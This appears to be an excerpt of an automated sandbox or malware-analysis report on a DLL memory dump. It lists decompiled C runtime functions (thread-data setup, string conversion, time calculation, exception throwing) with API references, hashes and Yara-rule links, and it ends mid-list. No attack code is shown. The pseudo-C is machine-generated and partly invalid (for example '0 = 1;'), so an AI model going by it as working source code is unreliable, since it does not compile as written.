                                                                                                                                                0x10019772
                                                                                                                                                0x10019779

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                                • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000EA65, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                			E1000EA65(void* __ebx, void* __edi) {

				E100130A0();
				if(E100148B1(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10332c68);
					__eax = E10013034( *0x10333820);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E10013107(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}



                                                                                                                                                0x1000ea65
                                                                                                                                                0x1000ea7c
                                                                                                                                                0x1000ea82
                                                                                                                                                0x1000ea83
                                                                                                                                                0x1000ea8f
                                                                                                                                                0x1000ea97
                                                                                                                                                0x1000ea99
                                                                                                                                                0x1000eab2
                                                                                                                                                0x1000eab3
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ea9b
                                                                                                                                                0x1000ea9b
                                                                                                                                                0x1000ea9c
                                                                                                                                                0x1000ea9d
                                                                                                                                                0x1000eaa4
                                                                                                                                                0x1000eaaa
                                                                                                                                                0x1000eaae
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000ea99
                                                                                                                                                0x1000ead1

                                                                                                                                                APIs
                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                  • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                  • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                  • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                  • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                  • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                  • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330250), ref: 10013041
                                                                                                                                                  • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                  • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330350,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                  • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                  • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                  • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                  • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1662683381-0
                                                                                                                                                • Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                • Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022AB3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280);
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                0x1001a740
                                                                                                                                                0x1001a740
                                                                                                                                                0x1001a740
                                                                                                                                                0x1001a743
                                                                                                                                                0x1001a745
                                                                                                                                                0x1001a750
                                                                                                                                                0x1001a751
                                                                                                                                                0x1001a75e
                                                                                                                                                0x1001a773
                                                                                                                                                0x1001a778
                                                                                                                                                0x1001a77f
                                                                                                                                                0x1001a794
                                                                                                                                                0x1001a7a3
                                                                                                                                                0x1001a7a8
                                                                                                                                                0x1001a7af
                                                                                                                                                0x1001a7b4
                                                                                                                                                0x1001a7b7
                                                                                                                                                0x1001a7b9
                                                                                                                                                0x1001a7cc
                                                                                                                                                0x1001a7d1
                                                                                                                                                0x1001a7d1
                                                                                                                                                0x1001a7e3
                                                                                                                                                0x1001a7f6
                                                                                                                                                0x1001a801
                                                                                                                                                0x1001a802
                                                                                                                                                0x1001a814
                                                                                                                                                0x1001a822
                                                                                                                                                0x1001a828
                                                                                                                                                0x1001a835
                                                                                                                                                0x1001a840
                                                                                                                                                0x1001a84a

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001A794
                                                                                                                                                  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                  • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                  • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                • String ID: unknown err
                                                                                                                                                • API String ID: 3541540748-813478822
                                                                                                                                                • Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                • Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001815A, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D4F5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F720(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                0x10018162
                                                                                                                                                0x10018169
                                                                                                                                                0x1001817e
                                                                                                                                                0x00000000
                                                                                                                                                0x10018170
                                                                                                                                                0x10018172
                                                                                                                                                0x1001818a
                                                                                                                                                0x1001818f
                                                                                                                                                0x10018192
                                                                                                                                                0x10018195
                                                                                                                                                0x100181be
                                                                                                                                                0x100181c3
                                                                                                                                                0x100181c7
                                                                                                                                                0x10018248
                                                                                                                                                0x1001825a
                                                                                                                                                0x10018263
                                                                                                                                                0x10018265
                                                                                                                                                0x100181a5
                                                                                                                                                0x100181a5
                                                                                                                                                0x100181a8
                                                                                                                                                0x100181aa
                                                                                                                                                0x100181ad
                                                                                                                                                0x100181ad
                                                                                                                                                0x100181ad
                                                                                                                                                0x100181ad
                                                                                                                                                0x00000000
                                                                                                                                                0x100181b3
                                                                                                                                                0x10018227
                                                                                                                                                0x10018227
                                                                                                                                                0x1001822c
                                                                                                                                                0x10018232
                                                                                                                                                0x10018235
                                                                                                                                                0x10018237
                                                                                                                                                0x1001823a
                                                                                                                                                0x1001823a
                                                                                                                                                0x1001823a
                                                                                                                                                0x1001823a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001823e
                                                                                                                                                0x100181c9
                                                                                                                                                0x100181cc
                                                                                                                                                0x100181cc
                                                                                                                                                0x100181d2
                                                                                                                                                0x100181d5
                                                                                                                                                0x100181fc
                                                                                                                                                0x100181ff
                                                                                                                                                0x100181ff
                                                                                                                                                0x10018205
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10018207
                                                                                                                                                0x1001820a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001820c
                                                                                                                                                0x1001820c
                                                                                                                                                0x1001820f
                                                                                                                                                0x1001820f
                                                                                                                                                0x10018215
                                                                                                                                                0x10018183
                                                                                                                                                0x10018183
                                                                                                                                                0x1001821e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001821e
                                                                                                                                                0x100181d7
                                                                                                                                                0x100181da
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100181de
                                                                                                                                                0x100181ec
                                                                                                                                                0x100181ef
                                                                                                                                                0x100181f5
                                                                                                                                                0x100181f7
                                                                                                                                                0x100181fa
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100181fa
                                                                                                                                                0x10018197
                                                                                                                                                0x1001819a
                                                                                                                                                0x1001819c
                                                                                                                                                0x100181a2
                                                                                                                                                0x100181a2
                                                                                                                                                0x00000000
                                                                                                                                                0x10018174
                                                                                                                                                0x10018174
                                                                                                                                                0x10018179
                                                                                                                                                0x1001817b
                                                                                                                                                0x1001817b
                                                                                                                                                0x00000000
                                                                                                                                                0x10018179
                                                                                                                                                0x10018172

                                                                                                                                                APIs
                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A370, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAC0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF20(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}






                                                                                                                                                0x1001a376
                                                                                                                                                0x1001a389
                                                                                                                                                0x1001a3a2
                                                                                                                                                0x1001a3a8
                                                                                                                                                0x1001a3b5
                                                                                                                                                0x1001a3bb
                                                                                                                                                0x1001a3c6
                                                                                                                                                0x1001a3e2
                                                                                                                                                0x1001a3ee
                                                                                                                                                0x1001a3fa

                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 745779501-0
                                                                                                                                                • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001F570, Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E1001F570() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}










                                                                                                                                                0x1001f576
                                                                                                                                                0x1001f57c
                                                                                                                                                0x1001f582
                                                                                                                                                0x1001f588
                                                                                                                                                0x1001f58e
                                                                                                                                                0x1001f594
                                                                                                                                                0x1001f59a
                                                                                                                                                0x1001f5a4
                                                                                                                                                0x1001f5b2
                                                                                                                                                0x1001f5c0
                                                                                                                                                0x1001f5c9
                                                                                                                                                0x1001f5cf
                                                                                                                                                0x1001f5e0
                                                                                                                                                0x1001f5e3
                                                                                                                                                0x1001f5ef

                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3735792614-0
                                                                                                                                                • Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                • Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
                                                                                                                                                • Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                • Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100026D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E100026D0(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10022D98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001E70( &_v56,  &_v84);
				E1000EBEB( &_v56, 0x103307b8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}









                                                                                                                                                0x100026d3
                                                                                                                                                0x100026d5
                                                                                                                                                0x100026e0
                                                                                                                                                0x100026e1
                                                                                                                                                0x100026f3
                                                                                                                                                0x100026f8
                                                                                                                                                0x10002706
                                                                                                                                                0x10002714
                                                                                                                                                0x10002719
                                                                                                                                                0x10002723
                                                                                                                                                0x1000272b
                                                                                                                                                0x10002735

                                                                                                                                                APIs
                                                                                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                  • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330760,103332E0), ref: 1000EC2B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                • String ID: vector<T> too long
                                                                                                                                                • API String ID: 1843230569-3788999226
                                                                                                                                                • Opcode ID: 30c3e472621d2f35f9e79f67c1309a68cdc690ade9fbe975f390bb3dee004a40
                                                                                                                                                • Instruction ID: ab61ff5c852f7bd7f9835bcfe6148f720b34d9498a962a2989811ffb75aa1c5c
                                                                                                                                                • Opcode Fuzzy Hash: 30c3e472621d2f35f9e79f67c1309a68cdc690ade9fbe975f390bb3dee004a40
                                                                                                                                                • Instruction Fuzzy Hash: 9BF05875804688EBDB14DBD4DD81BDEB778FB047A0F900728F522676C4DB342A04CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000442C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F00B(E10022968, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001D90(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
				E1000EBEB(_t25 - 0x50, 0x10330168);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100232c8;
				return _t23;
			}








                                                                                                                                                0x1000442c
                                                                                                                                                0x1000442c
                                                                                                                                                0x10004433
                                                                                                                                                0x10004440
                                                                                                                                                0x10004445
                                                                                                                                                0x10004445
                                                                                                                                                0x1000444d
                                                                                                                                                0x10004450
                                                                                                                                                0x1000445e
                                                                                                                                                0x10004465
                                                                                                                                                0x1000446a
                                                                                                                                                0x1000446b
                                                                                                                                                0x10004470
                                                                                                                                                0x10004472
                                                                                                                                                0x10004477
                                                                                                                                                0x10004480

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10004465
